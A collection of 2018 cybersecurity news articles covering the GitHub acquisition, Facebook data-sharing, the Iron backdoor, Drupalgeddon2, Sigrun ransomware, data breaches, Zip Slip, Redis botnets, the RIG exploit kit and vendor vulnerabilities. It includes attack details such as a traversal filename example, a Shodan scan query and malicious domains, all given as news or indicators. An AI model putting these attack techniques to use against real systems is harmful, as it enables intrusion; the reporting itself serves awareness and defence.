Updated: Microsoft reportedly acquires the GitHub popular code repository hosting service
6.6.2018 securityaffairs IT

Microsoft has reportedly acquired the popular code repository hosting service GitHub, but at the time of writing there is no news about how much Microsoft paid for the platform.
Microsoft has reportedly acquired the popular code repository hosting service GitHub.

GitHub was last valued at $2 billion in 2015, but at the time of writing there is no news about how much Microsoft paid for the platform.

“The software maker has agreed to acquire GitHub, the code-repository company popular with many software developers, and could announce the deal as soon as Monday, according to people familiar with the matter.” reported a post published by Bloomberg.

GitHub board decided to sell to Microsoft because of the leadership of Microsoft’s CEO Satya Nadella and his vision on the open source technology.

Github currently hosts more than 80 million code repositories, it has a privileged position in the software development community, the company that owns this platform could have strategic benefits from the knowledge of the projects that are hosted on the platform.

Of course, part of the open source community disagrees with Github move and is opting to switch to competitor services such as BitBucket or GitLab.

Bryan Lunduke
@BryanLunduke
To those that have @GitHub accounts:

If @Microsoft buys GitHub... would you continue to use it? Or would you move your repositories to a different service?

6:21 PM - Jun 2, 2018
32%Stick with GitHub
68%Move to another service
632 votes • Final results
56
95 people are talking about this
Twitter Ads info and privacy
Many development teams fear Microsoft could abuse its position after the acquisition gaining full access to the millions of private projects hosted on GutHub.

The code hosting service GitLab has seen a massive traffic spike after news of the deal, with thousands of projects and code repositories are being transferred from GitHub.

code repository GitHub deal

At the time of writing, neither Microsoft nor GitHub has commented on the acquisition deal.
Updated on June 4
In a blog post published today, Microsoft confirmed that will acquire GitHub for $7.5 billion in Microsoft stock.

“GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device.” reads the blog post.

“Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives.”


NYT: Facebook APIs gave device makers deep access to user data. FB disagrees
6.6.2018 securityaffairs
Social

Facebook APIs granted access to the data belonging to FB users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.
After the Cambridge Analytica privacy scandal, Facebook is now facing new problems because it is accused of sharing user data with over 60 device-makers.

The social network giant had granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions, “Like” buttons, address books, and other features without requiring their users to install a separate app.

“Facebook has reached data-sharing partnerships with at least 60 device makers — including Apple, Amazon, BlackBerry, Microsoft and Samsung — over the last decade, starting before Facebook apps were widely available on smartphones, company officials said.” states the New York Times.

“The deals allowed Facebook to expand its reach and let device makers offer customers popular features of the social network, such as messaging, “like” buttons and address books.”

The controversial practice started more than 10 years ago, before Facebook apps were widely available on smartphones.

The partnerships raise concerns about the company’s privacy protections and compliance with a 2011 consent decree with the Federal Trade Commission. The decree barred the social network giant from sharing data of users’ Facebook friends with other companies without their explicit consent.
Facebook APIs- Cambridge Analytica
To support the accusation, Michael LaForgia, a New York Times reporter, used a 2013 Blackberry device to access his Facebook account with roughly 550 friends.

He discovered that a BlackBerry app called “The Hub” was still able to harvest private data from 556 of his friends, exposed info including religious and political orientation.

The reported also discovered that The Hub was also able to acquire “identifying information” for up to 294,258 friends of his Facebook friends.

“After connecting to Facebook, the BlackBerry Hub app was able to retrieve detailed data on 556 of Mr. LaForgia’s friends, including relationship status, religious and political leanings and events they planned to attend.” continues the NYT.

“Facebook has said that it cut off third parties’ access to this type of information in 2015, but that it does not consider BlackBerry a third party in this case.”

Facebook responded to the accusation of the NYT report in a blog post entitled “Why We Disagree with The New York Times.”

The social network confirmed that the Facebook APIs were created to allow device-makers to improve the experience of Facebook users implementing features on their operating systems, you have to consider that at the time there were no apps.

“The New York Times has today written a long piece about our device-integrated APIs — software we launched 10 years ago to help get Facebook onto mobile devices.” states the post published by Facebook.

“In the early days of mobile, the demand for Facebook outpaced our ability to build versions of the product that worked on every phone or operating system. It’s hard to remember now, but back then there were no app stores.”

“So companies like Facebook, Google, Twitter and YouTube had to work directly with operating system and device manufacturers to get their products into people’s hands. This took a lot of time—and Facebook was not able to get to everyone.”

“To bridge this gap, we built a set of device-integrated APIs that allowed companies to recreate Facebook-like experiences for their individual devices or operating systems. Over the last decade, around 60 companies have used them—including many household names such as Amazon, Apple, Blackberry, HTC, Microsoft, and Samsung.”

The company added that it carefully monitored the use of the Facebook APIs avoiding any abuses, it also added that device-vendors signed agreements that prevented Facebook users’ information from being used for other purposes.

“Partners could not integrate the user’s Facebook features with their devices without the user’s permission. And our partnership and engineering teams approved the Facebook experiences these companies built,” continues the post.

“Contrary to claims by the New York Times, friends’ information, like photos, was only accessible on devices when people made a decision to share their information with those friends. We are not aware of any abuse by these companies.”

Facebook APIs mobile devices

After more than ten years things are changed and the Cambridge Analytica scandal has made used aware the importance of their privacy

Today both Facebook iOS and Android apps are very popular and the criticized Facebook APIs are no more used, for this reason, the company began “winding down” the partnerships in April.

“This is very different from the public APIs used by third-party developers, like Aleksandr Kogan. These third-party developers were not allowed to offer versions of Facebook to people and, instead, used the Facebook information people shared with them to build completely new experiences.” concluded Facebook.

“Now that iOS and Android are so popular, fewer people rely on these APIs to create bespoke Facebook experiences. It’s why we announced in April that we’re winding down access to them. We’ve already ended 22 of these partnerships. As always we’re working closely with our partners to provide alternative ways for people to still use Facebook.”


Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw
6.6.2018 securityaffairs
Virus

Security experts at security firm Intezer have recently discovered backdoor, associated with the operation of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).
The Remote Control System (RCS) is the surveillance software developed by the HackingTeam, it was considered a powerful malware that is able to infect also mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VOIP voice calls (e.g. Skype), the mobile version, available for all the OSs (Apple, Android, Symbian, and Blackberry), is also able to completely control the handset and its components, including the camera, the microphone and GPS module.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed using UPX, the malicious code is able to determine if it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor dll to %localappdata%\Temp\\<random>.dat, then checks OS version to determine the backdoor to launch.

The malware halts its execution if detect the presence of Qhioo360 products. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

The analysis of the backdoor revealed it uses two main functions in their IronStealer and Iron ransomware families, the VM detection code that was borrowed from the HackingTeam’s “Soldier” implant and the DynamicCall module from HackingTeam’s “core” library.

iron cybercrime group backdoor extension

The malware used a patched version of the popular Adblock Plus chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also includes Adblock Plus for IE that is capable of injecting remote JavaScript, a functionality, however, is no longer automatically used.

The malware automatically decrypts a hard coded shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin address.

The malicious code is able to drop two malware. a variant of “JbossMiner Mining Worm” tracked as Xagent and the Iron ransomware.

The group used the malware to stealing cryptocurrency from the victim’s workstation, the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets.

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.

Further details, including the IoCs are reported in the blog post published by the researchers.


Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
6.6.2018 securityaffairs
Vulnerebility

Two months after the release of the security updates for the drupalgeddon2 flaw, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.
In March, the Drupal developers Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600, aka drupalgeddon2, affecting Drupal 7 and 8 versions.

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates that were issued a few days later.

The vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.

Two months after the release of the security updates, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.

According to the security researcher Troy Mursch, there are over 115,000 Drupal sites that have installed security patched for drupalgeddon2 vulnerability.

The experts scanning the Internet for websites running Drupal 7.x CMS version found over 500,000 sites, 115,070 of them running outdated versions of the popular CMS that were vulnerable to the Drupalgeddon 2 flaw. The scan didn’t search for 6.x and 8.x sites.
“How many Drupal sites are vulnerable?To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

115,070 sites were outdated and vulnerable.
134,447 sites were not vulnerable.
225,056 sites I could not ascertain the version used.”
Drupalgeddon2

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns are continuing even after his first report,

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign, the document includes now data on several different campaigns he discovered.

Bad Packets Report
@bad_packets
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign.

9:37 AM - May 31, 2018
15
See Bad Packets Report's other Tweets
Twitter Ads info and privacy

Bad Packets Report
@bad_packets
31 May
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign. pic.twitter.com/dJbqshysUg

Bad Packets Report
@bad_packets
This case of #cryptojacking is caused by upgraderservices[.]cf/drupal.js which injects #Coinhive. Site key "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos" is used. pic.twitter.com/a9dxCfbR3s

9:37 AM - May 31, 2018

5
See Bad Packets Report's other Tweets
Twitter Ads info and privacy
The expert published IoCs for the campaign, the presence online of 115,000 of Drupal 7.x web sites is very danger, a gift for crooks that can abuse them for a broad range of illegal activities.


The author of the Sigrun Ransomware decrypts Russian victims’ files for free
6.6.2018 securityaffairs
Ransomware

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, others have to pay a ransom of $2,500 worth of Bitcoin or Dash for the victims.
We have reported several cases where Russian malware authors avoid infecting computers in their country, but the case we are going to discuss is interesting too.

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while the malware demands the payment of a ransom of $2,500 worth of Bitcoin or Dash for the victims.

The case was first spotted by the malware researcher Alex Svirid, and other experts confirmed his discovery.

Alex Svirid
@thyrex2002
31 May
Sigrun Ransomware author free decrypt files for users from some countries former USSR (with Russian primary language)

S!Ri
@siri_urz
Yup, many are doing that. Guess who is Russian and who is American? pic.twitter.com/1pS6NhPtXN

3:36 PM - May 31, 2018

See S!Ri's other Tweets
Twitter Ads info and privacy
The Sigrun ransomware also avoids infecting Russian victims by detecting the keyboard layout, this behavior allows Russian vxers to avoid the response of local authorities.

When Sigrun ransomware is executed, it will first check “HKEY_CURRENT_USER\Keyboard Layout\Preload” to determine if it is set to the Russian layout. If the machine is using a Russian layout, it will not encrypt its files and delete itself.

Experts pointed out that the ransomware also infects users in the former USSR Republics because many of them don’t use the Russian keyboard layout for political reason. For this reason, the authors of the Sigrun ransomware decided to provide for free the decryption key to Russian victims.

“Ukranian users don’t use russian layout because of political reasons. So we decided to help them if they was infected,” the Sigrun author told BleepingComputer via email.

“We have already added avoiding Ukrainian layout like was in Sage ransomware before.” They also told us that the email images above are not from Sigrun but another ransomware.

Lawrence Abrams from BleepingComputer has spoken with the author of the malware that told him that he isn’t from former USSR republics.

“Finally, the Sigrun developer told us that they are “not from former USSR republics. I added it because of my Belarus partners.” added Abrams.

When Sigrun ransomware is executed on a computer, it will scan a computer for files to encrypt, when it encrypts a file it will append the .sigrun extension to the encrypted file’s name. The malware creates two ransom notes named RESTORE-SIGRUN.txt and RESTORE-SIGRUN.html in each folder containing encrypted files.

Experts noticed that it doesn’t encrypt files that match certain extensions, filenames, or that are located in particular folders.

The ransom notes include information on the infection and payment instructions.
“At this time, the Sigrun Ransomware cannot be decrypted for free unless you are a Russian victim and the author helps you,” concluded Lawrence.

Further technical details, including IoCs, are reported in the analysis shared by BleepingComputer.


MyHeritage data breach – 92.3 million user credential exposed
6.6.2018 securityaffairs Incindent

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million Myheritage users stored on a private server outside the company.
The huge trove of data was contained in a file named “,” according to the experts the information is authentic and comes from Myheritage.

“Today, June 4, 2018 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for the investigation of family history and the reconstruction of the family tree through the DNA analysis.

myHeritage familytree

The expert who made the disconcerting discovery reported it to the company on June 4, 2018, the incident seems to have affected those users who signed up for the service before and including Oct. 26, 2017.

The expert only found usernames and hashed passwords, no other info was discovered on the server hosting the file.

The company pointed out that passwords were not stored in a plain text but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time the company hasn’t observed any abuse of compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the security breach and is going to hire cybersecurity firm to conduct comprehensive forensic investigations.

The company announced it is planning to introduce the two-factor authentication feature to provide a further protection to its users.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”


‘Zip Slip’ arbitrary file overwrite vulnerability affects thousands of projects
6.6.2018 securityaffairs
Vulnerebility

Security experts from British software firm Snyk have discovered a critical vulnerability, dubbed ‘Zip Slip’ that affects thousands of projects across many industries.
The flaw, that remained hidden for years, could be exploited by attackers to execute arbitrary code on the vulnerable systems.

zip slip

The Zip Slip is an arbitrary file overwrite vulnerability that could be triggered with a directory traversal attack while extracting files from an archive,

Unfortunately, the flaw affects many archive formats, including tar, jar, war, cpio, apk, rar, and 7z.

“Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution.” states the blog post published by the experts.

“It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here).”

Thousands of projects written in several programming languages (i.e. JavaScript, Ruby, Java, .NET and Go) from tech giants include vulnerable libraries and codes.

Attackers can trigger the Zip Slip flaw using a specially crafted archive file that holds directory traversal filenames (e.g. ../../evil.sh).
Once a vulnerable code o library has extracted the content of the archive, it would allow attackers to unarchive malicious files outside of the folder where it should reside.

“The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.” continues the analysis.

“The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.”

The researchers published proof-of-concept Zip Slip archives and released a video PoC for the Zip Slip flaw.

Experts shared two sample examples of malicious zip and tar files (for both Unix and windows files systems) with filenames that extract a file to the /tmp/ or \Temp\ folders

Since April, Snyk privately reported the flaw to the maintainers of all vulnerable libraries and projects, it is maintaining a GitHub repository listing all flawed projects. The repository is open to contributions from the wider community to ensure it holds the most up to date status.


HR Software company PageUp victim of a Data Breach, experts fear a domino effect
6.6.2018 securityaffairs Incindent

HR Software Firm PageUp is the last victim of a data breach, the company has 2.6 million active users across over 190 countries.
Another day another data breach makes the headlines, this time the victim is the HR Software Firm PageUp. PageUp is an Australian company with 2.6 million active users across over 190 countries.

The company notified the incident to its customers, informing them that it has launched a forensic investigation with the support from an independent 3rd party firm.

The company has notified the breach to law enforcement and data regulators in Australia and the United Kingdom.

According to the firm, on May 28 attackers accessed to internal records may continuing customer data, including names, contact information, usernames, and password hashes. Other sensitive data, including signed employment contracts and resumes, are not affected because they are stored on servers that were not affected by the security breach.

“On May 23, 2018, PageUp detected unusual activity on its IT infrastructure and immediately launched a forensic investigation. On May 28, 2018 our investigations revealed that we have some indicators that client data may have been compromised, a forensic investigation with assistance from an independent 3rd party is currently ongoing.” reads the data breach notification published by the company.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,”

At the time, the firm did not disclose technical details about the security breach, it only confirmed that its systems were infected by a malware.

“we can share that the source of the incident was a malware infection. The malware has been eradicated from our systems and we have confirmed that our anti-malware signatures can now detect the malware. We see no further signs of malicious or unauthorised activity and are confident in this assessment.” continues the notification.

Just after the news of the breach, some of the company that uses the PageUp service have shut down their online recruitment pages and notified job applicants

According to the Australia Post, data potentially impacted by the incident may include:

Bank details
Tax File Number and superannuation details
Diversity information
Emergency contact information
Conditions of offer and employment
Address
Mobile phone number
Questions relevant to the job such as if you have Work Rights or an Australian citizenship
Education and work experience
License number
PageUp

After the incident, the Australian telecoms giant Telstra suspended its online recruitment and notified the issue to the applicants.

“The online recruitment system we use is currently unavailable.
We are aware of a security incident with one of our vendors, PageUp, a company that provides us software services used as part of our employee recruitment processes.” states the security advisory published by Telstra,

“We are among a number of organisations who use PageUp. PageUp has provided more information here. We have held discussions with PageUp to understand any possible impact to the security of the services they provide”

Unfortunately, many other organization may have been impacted by the incident.


Imperva’s research shows 75% of open Redis servers are infected
3.6.2018 securityaffairs
Virus

According to the security experts at Imperva firm, three open Redis servers out of four are infected with malware.
The discovery is the result of analysis conducted by running Redis-based honeypot servers for some months.

Since their initial report on the RedisWannaMine attack that propagates through open Redis and Windows servers, the experts from Imperva have discovered a new wave of attacks against Redis servers exposed online without authentication.

One of the most common attacks against Redis servers consists of adding SSH keys, so the attacker can remotely access the machine and take it over.

“Having let our honeypot collect data for some time, we noticed that different attackers use the same keys and/ or values to carry out attacks.” states the report published by the experts.

“As such, a shared key or value between multiple servers is a clear sign of a malicious botnet activity.”

The experts used the SSH keys they’ve collected through their honeypot to scan Redis servers that were left exposed online for the presence of these keys.

The experts obtained a list of over 72,000 Redis servers available online by using the shodan query ‘port:6379,’ over 10,000 of these responded to its scan request without an error, allowing researchers to determine locally installed SSH keys.

Redis servers scans

The discovery was disconcerting, over 75% of these Redis servers were using an SSH key associated with a botnet.

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected.” continues the report.

“Also according to our honeypot data, the infected servers with “backup” keys were attacked from a medium-sized botnet ( ) located at China (86% of IPs).”

Imperva revealed that its customers were attacked more than 75k times, by 295 IPs that run publicly available Redis servers, this means that threat actors are exploiting vulnerable installs to compose their botnet and power a broad range of attacks (SQL injection, cross-site scripting, malicious file uploads, remote code executions, etc).

The “crackit” SSH key in the above table is known to be used at least since 2016 by a known threat actor to spread ransomware and to blackmail the owners of the compromised servers.

The main problem with Redis servers is that owners ignore that Redis doesn’t use a secure configuration by default because they are designed to operate in closed IT networks.

Before some recommendation to the admins operating Redis servers:

Make sure you follow Redis Security notes, i.e.
Don’t expose your Redis to the internet
If possible, apply authentication
Don’t store sensitive data in clear text
Monitor your Redis server to make sure it is not infected.
You can monitor processes or CPU consumption to check if a crypto mining malware is running. You can also use the keys and values mentioned in the tables above to monitor the data stored in your Redis server.
Make sure you run Redis with the minimal privileges necessary. Running it with root user, for example, is a bad practice, since it greatly increases the potential damage that an attacker can cause.


Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
3.6.2018 securityaffairs
Vulnerebility

Cyber criminals recently added the code for the CVE-2018-8174 Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.
Crooks recently added the code for an Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.

The Internet Explorer zero-day vulnerability, tracked as CVE-2018-8174, was first discovered a few weeks ago, it affects VBScript implemented in Internet Explorer and Microsoft Office.

Researchers from Advanced Threat Response Team of 360 Core Security Division first reported the zero-day

In May, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses it. The experts codenamed the vulnerability as “double kill” exploit.

Qihoo 360 researchers reported the vulnerability to Microsoft that addressed the flaw in the May 2018 Patch Tuesday security updates.

After the release of the security updates, on May 8, experts from Kaspersky Lab and Malwarebytes published a detailed analysis of the vulnerability, while researchers from Morphisec security firm released a proof-of-concept (PoC) code.

Experts released a Metasploit module for the exploitation of the CVE-2018-8174 once the PoC code was available online.

The availability of the PoC code for the vulnerability is a gift for vxers, in the specific case, the crooks included the code for the CVE-2018-8174 flaw in the RIG exploit kit.

“A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now beeing integrated in Browser Exploit Kits.” wrote the security researcher Kafeine.

“This will replace CVE-2016-0189 from july 2016 and might shake the Drive-By landscape for the coming months.”

CVE-2018-8174 RIG

Researchers from Trend Micro also observed that the RIG Exploit Kit is now leveraging CVE-2018-8174 to deliver Monero cryptocurrency miner.

“Along with updates in code, we also observed Rig integrating a cryptocurrency-mining malware as its final payload.” reads the analysis from Trend Micro.

“Based on the latest activities we’ve observed from Rig, they’re now also exploiting CVE-2018-8174, a remote code execution vulnerability patched in May and reported to be actively exploited.”

Cyber criminals were hijacking the traffic of legitimate sites and redirecting IE users to compromised websites hosting the RIG exploit kit. The RIG exploit kit was used to drop the Smoke Loader malware, a tiny dropper used to install on the infected system a cryptocurrency miner.

CVE-2018-8174 RIG exploit kit monero-miner-1


Tens of Vulnerabilities Found in Quest Appliances
3.6.2018 securityweek
Vulnerebility

Researchers at Core Security say they have discovered a total of more than 60 vulnerabilities in disk backup and system management appliances from Quest. The IT management firm has released patches, but threatened to take legal action against Core if it disclosed too many details.

More than 50 security holes have been found in Quest’s DR series disk backup appliances. The most serious of the flaws, according to Core, allows a remote and unauthenticated attacker to execute arbitrary system commands via the “password” parameter of the login process.

Experts also identified 45 other command injection issues in the product, but these require authentication. Core also claims to have uncovered six privilege escalation vulnerabilities that allow an attacker to gain root permissions.

The weaknesses impact Quest DR Series Disk Backup software version 4.0.3 and possibly earlier, and they have been patched with the release of version 4.0.3.1.

A separate advisory from Core describes 11 flaws affecting Quest’s KACE Systems Management Appliance. Researchers found that the product’s web console is affected by three command injection vulnerabilities, including one that can be exploited by an unauthenticated attacker.

The list of security holes found in this product also includes privilege escalation, SQL injection, cross-site scripting (XSS), and path traversal issues.

The vulnerabilities have been patched with a hotfix that is available for Quest KACE System Management Appliance versions 7.0, 7.1, 7.2, 8.0, and 8.1.

During the disclosure of the KACE flaws, Quest told Core that its work is in breach of the vendor’s license agreement and asked the security firm not to make its findings public to avoid legal action.

Quest, whose products are reportedly used by 130,000 companies, does have a responsible disclosure policy, but it states that reports of any vulnerability are considered the company’s confidential and proprietary information and cannot be disclosed to third parties.

Core has only published limited information about each of the vulnerabilities, but the company says it’s disappointed by Quest’s posture on disclosure.

“CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk,” Core said.


Hardcoded Credentials Expose Yokogawa Controllers to Attacks
3.6.2018 securityweek Attack

Japanese electrical engineering company Yokogawa has released firmware updates for its STARDOM controllers to address a critical vulnerability that can be exploited remotely to take control of the device.

Yokogawa’s STARDOM FCJ, FCN-100, FCN-RTU and FCN-500 controllers running firmware version R4.02 or earlier have a hardcoded username and password that can be used by an attacker with access to the network to log in to the device and execute system commands.

The flaw is tracked as CVE-2018-10592 and it has been rated critical by both ICS-CERT and Yokogawa itself. The issue was discovered by VDLab, an industrial cybersecurity lab set up by Chinese companies Venustech and Dongfang Electric.Critical vulnerability found in Yokogawa controllers

The vendor patched the vulnerability with the release of version R4.10. Customers have been advised to update the firmware on their devices and also implement overall security measures to protect their systems.

Critical vulnerability found in Yokogawa controllers

The FCN-500 product has been designed for high reliability and speed, and it includes features designed to ensure that processes are not interrupted even if a module is replaced. The FCN-RTU model is designed for inhospitable locations where low power consumption is needed. The products are used worldwide in the energy, critical manufacturing, and food and agriculture sectors. The FCJ and FCN-100 models were discontinued in mid-2016.

Yokogawa has published a total of four security advisories this year. One published in January warns customers that CENTUM and Exaopc products are affected by a vulnerability that allows a local attacker to trigger false system and process alarms, and prevent alarm notifications from being displayed to the user.

An advisory from late April describes authentication bypass and denial-of-service (DoS) flaws affecting Vnet/IP switches. The company has also alerted customers to the risks introduced by the use of the Intel Management Engine, which has several potentially serious vulnerabilities.


Punycode Makes SMiShing Attacks More Deceiving
2.6.2018 securityweek Attack

Phishing attacks carried out via text messages that use the “Punycode” technique to make nefarious URLs look legitimate are becoming more popular, cloud security firm Zscaler says.

Referred to as SMiShing, SMS phishing is a technique where attackers use text messages in an attempt to trick users into clicking a link that usually leads to malware or asks for sensitive information from the victims.

Recently, cybercriminals engaged in SMiShing campaigns started using Punycode (a technique also known as homograph attack) to deceive users into believing they are accessing a legitimate link. Specifically, the attackers replace one or more characters in the URL with similar-looking characters that are represented differently in Punycode.

Attacks leveraging Punycode are not new and have been targeting Office 365 business users and Chrome and Firefox users, but only recently they started occurring more frequently in text message attacks.

SMiShing has been on the rise since the beginning of the year, and the adoption of new techniques clearly make it an important threat.

The use of Punycode as part of SMiShing campaigns increases the chances for successful compromise, as mobile phone users are unlikely to notice the modified URL.

In one of the observed incidents, the unsuspecting user received a WhatsApp message pretending to be a link to a Jet Airways offer of free air tickets. Although looking like the actual jetairways.com website, the link was using a homograph attack, thus getting the user to xn-jetarways-ypb.com instead.

If the link is accessed on an iPhone, Safari attempts to load the phishing website without displaying the correct link. Chrome on Android, however, displays the correct link (shows the URL in Punycode format) instead.

“The Web browsers decide whether to display the IDN or Punycode format based on conditions like the presence of certain characters which can spoof the separators like "." or "/", determining whether all characters come from same language, if characters belong to allowable combinations or by checking if the domain belongs to whitelisted TLDs,” Zscaler explains.

The domain used as part of the observed attack was newly registered, within the last two weeks, the researchers say. They also note that, after being served the phishing page, victims are redirected to another domain, newuewfarben[.]com, which can be used to serve malware.

“SMiShing has been on a rise in year 2018 and the addition of homograph technique will continue to make it more effective against unsuspecting mobile users. Web browsers have implemented protections against homograph attacks, but because of the legitimate use of Punycode characters, it becomes very difficult for the developers to implement a foolproof fix. Attackers leverage this to work around the rules and create homographs which are displayed as IDNs despite being malicious in nature,” Zscaler concludes.


WordPress Disables Plugins That Expose e-Commerce Sites to Attacks

2.6.2018 securityweek Vulnerebility

Researchers discovered vulnerabilities in ten WordPress plugins made by a company for e-commerce websites powered by the WooCommerce platform. WordPress disabled many of them after the developer failed to release patches.

WordPress security firm ThreatPress reported on Thursday that its researchers discovered various types of flaws in ten plugins from Multidots. The impacted plugins are available through WordPress.org and they allow WooCommerce users to manage different aspects of their online shops.

The vulnerable plugins have nearly 20,000 active installs, including 10,000 installations of Page Visit Counter, 3,000 installations of WooCommerce Category Banner Management, and 2,000 installations of WooCommerce Checkout for Digital Goods.

Experts discovered that the plugins made by Multidots are impacted by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited to take complete control of impacted e-commerce sites.

According to researchers, attackers could deface websites, execute remote shells, plant keyloggers, and upload cryptocurrency miners or other types of malware. Attackers may be able to gain access to valuable information considering that the affected websites are online shops that collect personal and financial information.

“The vulnerabilities allow an unauthenticated attacker to inject malicious JavaScript, and thus provide the opportunity to hijack clients’ credit cards data and to receive clients’ and administrator’s logins,” ThreatPress’s Rasa Adams told SecurityWeek.

While exploitation in many cases requires the victim to access a specially crafted URL or visit a certain page, some of the flaws can be exploited without any user interaction.

Multidots was informed of the vulnerabilities on May 8 and confirmed the issues. However, after seeing that the developer failed to take any action, ThreatPress notified WordPress, which decided to disable a majority of the impacted plugins.

SecurityWeek reached out to Multidots for comment before ThreatPress made its findings public, but the company has not responded.

